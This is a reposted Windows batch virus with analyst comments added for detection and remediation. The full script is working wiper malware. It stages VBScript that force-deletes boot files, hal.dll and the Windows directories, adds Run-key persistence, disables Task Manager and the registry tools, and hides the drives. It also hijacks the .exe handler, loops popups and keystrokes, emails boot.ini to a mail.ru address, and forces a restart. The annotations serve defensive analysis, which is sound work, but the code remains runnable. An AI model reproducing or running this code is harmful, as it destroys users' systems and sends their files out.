
Untitled

a guest
Oct 15th, 2019
  rem Analyst notes. This is a forum repost of a Windows batch script: BBCode residue
  rem ([USER=...] here, [URL]/[EMAIL] in later lines) and list numbers are part of the text,
  rem so the listing is not a byte-exact sample and a hash of it is not a usable IoC.
  rem Match on the behaviours, file paths and strings instead.
  rem Banner lines: self-attribution strings (a handle and a domain) usable as string indicators.
  1. [USER=98981]@Echo[/USER] This virus created by LIZA
  2. [USER=98981]@Echo[/USER] Virus: pcforumhack.ru Virus
  3. [USER=98981]@Echo[/USER] Autor: LIZA
  4. [USER=98981]@Echo[/USER] off
  rem Stages three VBScript files in %temp% (temp.vbs, temp1.vbs, temp2.vbs) via echo redirection.
  rem Detection: cmd.exe writing .vbs files into the user's temp directory.
  5. echo Chr(39)>%temp%\temp1.vbs
  6. echo Chr(39)>%temp%\temp2.vbs
  rem temp.vbs begins with "on error resume next", so failures inside it are not surfaced,
  rem then creates WScript.Shell (S) and Scripting.FileSystemObject (FSO) objects.
  7. echo on error resume next > %temp%\temp.vbs
  8. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  9. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  rem Explorer policy values nodesktop and ClassicShell are written under a hard-coded user SID
  rem in HKEY_USERS, and the script's own path (%0) is stored in a variable. As pasted, these
  rem statements sit on one physical line.
  10. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  rem Self-copy into the Windows directory. File indicator: %SystemRoot%\user32dll.bat
  11. copy %¶§% %SystemRoot%\user32dll.bat
  rem Persistence: HKLM Run value "RunExplorer32" points at the copied file.
  rem Detection/remediation: audit Run keys for a .bat target under %SystemRoot%; delete the value and the file.
  12. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  rem NoDrives / NoViewOnDrive take a bitmask of drive letters; 67108863 = 0x03FFFFFF has bits 0-25 set,
  rem i.e. every letter A: through Z:, for the current user. Removing both values restores drive visibility.
  13. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  14. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  rem Appends to temp.vbs a forced delete of C:\ntldr (the boot loader on NT-family systems up to XP/2003).
  15. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  rem Internet Explorer tampering: three values under the per-user IE Restrictions policy key and one
  rem value (IExplorer = 0) under the machine-wide Feature_LocalMachine_Lockdown feature-control key.
  rem NOTE(review): the practical effect of the IExplorer value is not shown on this page - confirm before relying on it.
  16. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  17. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  18. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  19. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  rem Appends forced DeleteFolder calls for the Windows directory on three hard-coded drive letters (D:, I:, C:).
  20. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  21. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  22. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  rem Appends code that reads SystemRoot from the registry (three times) and then force-deletes
  rem system32\hal.dll, system32\dllcache and system32\drives beneath it.
  rem Impact: wiper-style damage to boot and system files; recovery means restoring these files from
  rem installation media or backup, not just cleaning the registry.
  23. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  24. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  25. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  26. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  27. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  28. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  rem Appends three RegWrite calls that stamp the string "forum.whack.ru" into the LocalizedString of
  rem CLSID {645FF040-5081-101B-9F08-00AA002F954E} (the Recycle Bin shell object) and into
  rem RegisteredOwner / RegisteredOrganization. These make quick host-side indicators during triage.
  29. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru">>%temp%\temp.vbs
  30. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru">>%temp%\temp.vbs
  31. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru">>%temp%\temp.vbs
  rem Rewrites temp1.vbs (">" truncates the earlier content): an error-suppressed endless do/loop
  rem that calls fso.getfile on A:\ on every iteration.
  32. echo on error resume next > %temp%\temp1.vbs
  33. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  34. echo do>>%temp%\temp1.vbs
  35. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  36. echo loop>>%temp%\temp1.vbs
  rem Rewrites temp2.vbs: an endless do/loop that runs "%comspec% /c echo" plus Chr(7) (the bell
  rem character) with window style 0 (hidden) and waits for each run to finish. %comspec% is
  rem expanded by cmd when this line is written, so the .vbs holds the resolved path.
  rem Detection: the script host repeatedly spawning hidden cmd.exe children from a %temp%\*.vbs parent.
  37. echo on error resume next > %temp%\temp2.vbs
  38. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  39. echo do>>%temp%\temp2.vbs
  40. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  41. echo loop>>%temp%\temp2.vbs
  rem Defence impairment: per-user policy values that disable Task Manager and the registry editing
  rem tools, which hinders on-host triage. Both are high-signal detections when set by a script.
  rem Remediation: remove the values from the affected user's hive (from another admin context or offline).
  42. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  43. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  rem Bulk Explorer / Start-menu restrictions for the current user, all REG_DWORD = 1 under
  rem HKCU\...\Policies\Explorer. They include NoRun, NoFind, NoClose and NoControlPanel, which
  rem remove the usual routes an operator would use to investigate or shut down cleanly.
  rem Detection: a burst of "reg add" writes to Policies\Explorer from a single cmd.exe process.
  44. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  45. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  46. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  rem Policies\NonEnum with CLSID {20D04FE0-3AEA-1069-A2D8-08002B30309D} (the My Computer shell object).
  47. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  48. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  49. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  50. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  51. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  52. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  53. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  54. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  55. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  56. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  57. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  58. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  59. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  60. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  61. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  62. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  63. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  64. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  65. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  66. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  rem Appends to temp.vbs a Shell.Application call that minimizes all open windows.
  67. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  68. echo application.minimizeall>>%temp%\temp.vbs
  rem Second Run-key entry ("SwapNT") plus an immediate call: rundll32 user32, SwapMouseButton
  rem swaps the primary and secondary mouse buttons. Registry indicator: HKLM Run value SwapNT.
  69. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  70. start rundll32 user32, SwapMouseButton
  rem Overwrites the default value of HKCR\exefile\shell\open\command, the handler used when any
  rem .exe is opened. The stock value is "%1" %*; any other data here is a high-confidence tamper
  rem indicator, and restoring that value is part of remediation.
  71. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  rem Appends to temp.vbs a counted loop (i starts at 50, decremented each pass) that shows a popup
  rem with text and title "forum.whack.ru" and type 0+16. The ^ characters escape > and < for cmd
  rem so they are written into the .vbs literally rather than treated as redirection.
  72. echo i=50 >> %temp%\temp.vbs
  73. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  74. echo S.popup "forum.whack.ru",0, "forum.whack.ru",0+16 >> %temp%\temp.vbs
  75. echo i=i-1 >> %temp%\temp.vbs
  76. echo wend >> %temp%\temp.vbs
  rem Appends a do/loop with no exit condition that sends CapsLock, NumLock and ScrollLock
  rem keystrokes via SendKeys with 200 ms sleeps between them.
  77. echo do >> %temp%\temp.vbs
  78. echo wscript.sleep 200 >> %temp%\temp.vbs
  79. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  80. echo wscript.sleep 200 >> %temp%\temp.vbs
  81. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  82. echo wscript.sleep 200 >> %temp%\temp.vbs
  83. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  84. echo loop>> %temp%\temp.vbs
  rem Appends code that instantiates the Windows Media Player control (WMPlayer.OCX.7) and calls
  rem eject on every item in its cdromCollection.
  85. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  86. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  87. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  88. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  89. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  90. echo next >> %temp%\temp.vbs
  91. echo End If >> %temp%\temp.vbs
  rem Appends to temp.vbs a call to, and the definition of, SendPost: a CDO.Message mail routine.
  rem As written it names server smtp.mail.ru, recipient forum.whack.ru@mail.ru, a sender at
  rem support@mail.ru, subject "..." and a Russian body (roughly "computer infected!").
  rem The [EMAIL]/[URL] tags inside the strings are forum BBCode residue that is part of this listing.
  92. echo Call SendPost("smtp.mail.ru", "forum.whack.ru@mail.ru", "[EMAIL]support@mail.ru[/EMAIL]", "...", "Копм заражен!") >> %temp%\temp.vbs
  93. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  94. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  95. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  96. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  rem CDO configuration fields: sendusing = 2 (send over the network to an SMTP port),
  rem smtpauthenticate = 1 (basic authentication), hard-coded username/password, server and port 25.
  rem The server is set from the literal here, not from the strSMTP_Server parameter.
  rem Network detection: a script host (wscript/cscript) opening outbound TCP/25; egress filtering of
  rem SMTP from workstations blocks this path.
  97. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusing[/URL]") = 2 >> %temp%\temp.vbs
  98. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpauthenticate[/URL]") = 1 >> %temp%\temp.vbs
  99. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusername[/URL]") = "support" >> %temp%\temp.vbs
  100. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendpassword[/URL]") = "support" >> %temp%\temp.vbs
  101. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserver[/URL]") = "smtp.mail.ru" >> %temp%\temp.vbs
  102. echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserverport[/URL]") = 25 >> %temp%\temp.vbs
  103. echo Flds.Update >> %temp%\temp.vbs
  104. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  105. echo iMsg.To = strTo >> %temp%\temp.vbs
  106. echo iMsg.From = strFrom >> %temp%\temp.vbs
  107. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  108. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  rem The message attaches c:\boot.ini, so a local file leaves the host with the mail.
  109. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  110. echo iMsg.Send >> %temp%\temp.vbs
  111. echo End Function >> %temp%\temp.vbs
  rem Releases the three CDO object references.
  112. echo Set iMsg = Nothing >> %temp%\temp.vbs
  113. echo Set iConf = Nothing >> %temp%\temp.vbs
  114. echo Set Flds = Nothing >> %temp%\temp.vbs
  115.  
  rem Last line appended to temp.vbs: a forced immediate restart (shutdown -r -t 0 -f) whose
  rem comment string is "pcforumhack.ru"; that string is a searchable indicator in shutdown event records.
  116. echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru"" -f",1 >> %temp%\temp.vbs
  rem Launches the three staged scripts through their file association.
  rem Detection: cmd.exe -> script host with a %temp%\temp*.vbs argument. Blocking or re-associating
  rem .vbs execution for standard users (e.g. via application control) stops this stage.
  117. start %temp%\temp.vbs
  118. start %temp%\temp1.vbs
  119. start %temp%\temp2.vbs